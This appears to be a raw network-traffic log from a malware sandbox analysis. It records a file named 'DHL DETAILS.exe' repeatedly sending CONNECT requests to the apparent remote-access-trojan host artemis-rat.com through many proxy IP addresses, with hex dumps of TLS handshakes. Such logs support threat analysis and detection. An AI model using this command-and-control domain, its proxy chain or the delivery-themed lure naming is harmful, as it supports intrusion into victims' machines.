                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.162249088 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1457192.168.2.55430394.30.152.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.192975044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1458192.168.2.5544023.97.176.25131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.196264029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.430217981 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1459192.168.2.554295195.87.217.7533896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.196264982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1460192.168.2.554423199.188.93.21490006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.200483084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1461192.168.2.554335157.245.48.119436956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.200661898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038374901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.037106037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.942539930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.739311934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.646416903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.536767960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1462192.168.2.554375212.118.43.143806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.200900078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1463192.168.2.554334176.119.25.1331286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.204770088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.915788889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.912206888 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1464192.168.2.55422791.134.140.16025726352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.204854965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1465192.168.2.554299216.9.224.113806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.205293894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1466192.168.2.554189223.113.80.15890916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.209497929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.670073032 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:15:07 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1467192.168.2.554395133.18.234.13806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.209726095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.495635033 CET113INHTTP/1.1 503 Service Temporarily Unavailable
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 42 61 63 6b 65 6e 64 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65
                                                                                    Data Ascii: Backend not available


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1468192.168.2.549850164.92.86.113629876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.209917068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1469192.168.2.55426838.54.116.981186352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.210133076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038623095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.333388090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.723838091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.505012989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.334048033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146424055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1470192.168.2.55425243.231.22.228806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.210580111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1471192.168.2.55439918.133.16.21806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.211503029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.506748915 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:19.507050037 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9a 17 77 37 78 46 7a 12 45 3f 6d d6 dd 60 32 28 d2 8e 51 61 5e c9 71 28 a7 a7 55 f7 45 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRw7xFzE?m`2(Qa^q(UE*,+0/$#('=<5/artemis-rat.com#ZlyEc(#HLl.YeM5F6S#4)"1}/JDQ o
                                                                                    Mar 9, 2024 13:14:19.800422907 CET536INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 4c f3 7f bf a1 c9 7f 62 7d 1b c4 2f fc 97 19 32 b2 c6 aa f1 7a c0 88 ff 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9Lb}/2zDOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:19.800535917 CET536INData Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22
                                                                                    Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,(
                                                                                    Mar 9, 2024 13:14:19.800544977 CET7INData Raw: 03 00 04 0e 00 00 00
                                                                                    Data Ascii:
                                                                                    Mar 9, 2024 13:14:19.844269037 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 54 d5 b9 01 23 cf a2 50 eb 3b f5 89 19 33 a5 43 dd 4c f7 02 42 d6 67 fe 6f ca b0 44 9f 2c ff 21 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 10 4b 6b 8f 33 24 5c 5d dd 6b 6e 6d 84 00 f0 7c e0 4c d9 ab 31
                                                                                    Data Ascii: %! T#P;3CLBgoD,!(Kk3$\]knm|L1s3kIA/
                                                                                    Mar 9, 2024 13:14:20.152260065 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 56 48 4d aa cf b2 8a d5 47 5c 15 ef b7 f7 15 99 60 02 39 7f 79 b3 28 42 fb c9 02 40 ae f7 2c 4f 0a e8 1f 75 13 96 12 ba
                                                                                    Data Ascii: (VHMG\`9y(B@,Ou


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1472192.168.2.553711178.62.229.2831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.211719990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1473192.168.2.5543828.130.34.23799996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.212888956 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1474192.168.2.554411119.28.60.6480906352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.212965965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1475192.168.2.55439631.220.78.244806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.212974072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.038377047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.037058115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1476192.168.2.5543838.219.97.248806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.215370893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.564666033 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx
                                                                                    Mar 9, 2024 13:14:19.565228939 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 9a 31 a1 1e 33 2e 65 c3 a4 12 fa dd 5c 97 23 0c c6 f2 bf 12 78 43 f9 65 ee 86 61 81 90 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheR13.e\#xCea*,+0/$#('=<5/artemis-rat.com#ZlyEc(#HLl.YeM5F6S#4)"1}/JDQ o
                                                                                    Mar 9, 2024 13:14:19.772373915 CET59INHTTP/1.1 200 Connection Established
                                                                                    Proxy-agent: nginx
                                                                                    Mar 9, 2024 13:14:19.918936968 CET115INData Raw: 16 03 03 00 3b 02 00 00 37 03 03 65 ec 52 9b af 7d 94 30 f2 e2 1c a3 42 e1 5f cf 2e 6e 34 90 b8 77 5f 05 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0f 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00
                                                                                    Data Ascii: ;7eR}0B_.n4w_DOWNGRD/(\gP>,Hn9ZT`WMjm"
                                                                                    Mar 9, 2024 13:14:19.957317114 CET303OUTData Raw: 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 70 f9 7e 9a 15 b8 be 6b b8 30 50 39 34 5a ab 6b e4 4e 4b bf ab ef 15 be fa 65 bb 84 a3 e9 4f b7 17 03 03 00 f7 00 00 00 00 00 00 00 01 52 76 45 54 04 e1 4b e7 23 34 34 99 18 ea 76 89 93 89
                                                                                    Data Ascii: (p~k0P94ZkNKeORvETK#44v~{2`vw|:f+q^-^vg!~<FGx@{u{JU_EAFynux.)iIMAN@S^$dm5b!P=;D
                                                                                    Mar 9, 2024 13:14:20.124151945 CET115INData Raw: 16 03 03 00 3b 02 00 00 37 03 03 65 ec 52 9b af 7d 94 30 f2 e2 1c a3 42 e1 5f cf 2e 6e 34 90 b8 77 5f 05 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 0f 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00
                                                                                    Data Ascii: ;7eR}0B_.n4w_DOWNGRD/(\gP>,Hn9ZT`WMjm"
                                                                                    Mar 9, 2024 13:14:21.402072906 CET1280INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 15 cb ca 72 4b 34 36 db 4b aa 4f f1 85 90 c7 3f 96 e3 3b b0 1d 0c c8 c6 12 28 dd 6c 15 8d bb 39 76 ae ca 83 50 f2 36 f5 ae 07 8e 7a dc e6 ff 89 fd 9d 31 41 19 24 c4 05 9e 57 f2 68 53 db cd 69 d3 9d 93 fb 1a
                                                                                    Data Ascii: qrK46KO?;(l9vP6z1A$WhSiKV',\e!u\6HZBEId'd0quQVJ*:3A.K;yS/q>j($zhI?^bS'X%X
                                                                                    Mar 9, 2024 13:14:21.402255058 CET118INData Raw: e0 f6 2d ba de 82 af 7e dd fd 8c ce b8 37 99 cd 8b 1e 36 b8 78 c9 04 91 85 52 06 5f 9a ed 50 06 df e7 47 06 b6 4a 1e 28 cb d8 7e b3 26 80 88 03 66 76 ae 74 c9 32 73 b8 0e 76 80 af c6 03 09 5d 30 05 80 bf 2c 69 d7 7f 3f 08 74 07 06 9f 36 da 19 da
                                                                                    Data Ascii: -~76xR_PGJ(~&fvt2sv]0,i?t6sx.?ip(2
                                                                                    Mar 9, 2024 13:14:21.405323029 CET118INData Raw: e0 f6 2d ba de 82 af 7e dd fd 8c ce b8 37 99 cd 8b 1e 36 b8 78 c9 04 91 85 52 06 5f 9a ed 50 06 df e7 47 06 b6 4a 1e 28 cb d8 7e b3 26 80 88 03 66 76 ae 74 c9 32 73 b8 0e 76 80 af c6 03 09 5d 30 05 80 bf 2c 69 d7 7f 3f 08 74 07 06 9f 36 da 19 da
                                                                                    Data Ascii: -~76xR_PGJ(~&fvt2sv]0,i?t6sx.?ip(2
                                                                                    Mar 9, 2024 13:14:21.613241911 CET1280INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 15 cb ca 72 4b 34 36 db 4b aa 4f f1 85 90 c7 3f 96 e3 3b b0 1d 0c c8 c6 12 28 dd 6c 15 8d bb 39 76 ae ca 83 50 f2 36 f5 ae 07 8e 7a dc e6 ff 89 fd 9d 31 41 19 24 c4 05 9e 57 f2 68 53 db cd 69 d3 9d 93 fb 1a
                                                                                    Data Ascii: qrK46KO?;(l9vP6z1A$WhSiKV',\e!u\6HZBEId'd0quQVJ*:3A.K;yS/q>j($zhI?^bS'X%X


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1477192.168.2.554348103.47.93.20810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.219417095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1478192.168.2.55389574.119.147.20941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.219604969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1479192.168.2.554421218.252.244.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.220166922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1480192.168.2.55441547.106.76.19680886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.227520943 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.574664116 CET767INHTTP/1.1 403 Forbidden
                                                                                    Server: Beaver
                                                                                    Cache-Control: no-cache
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 635
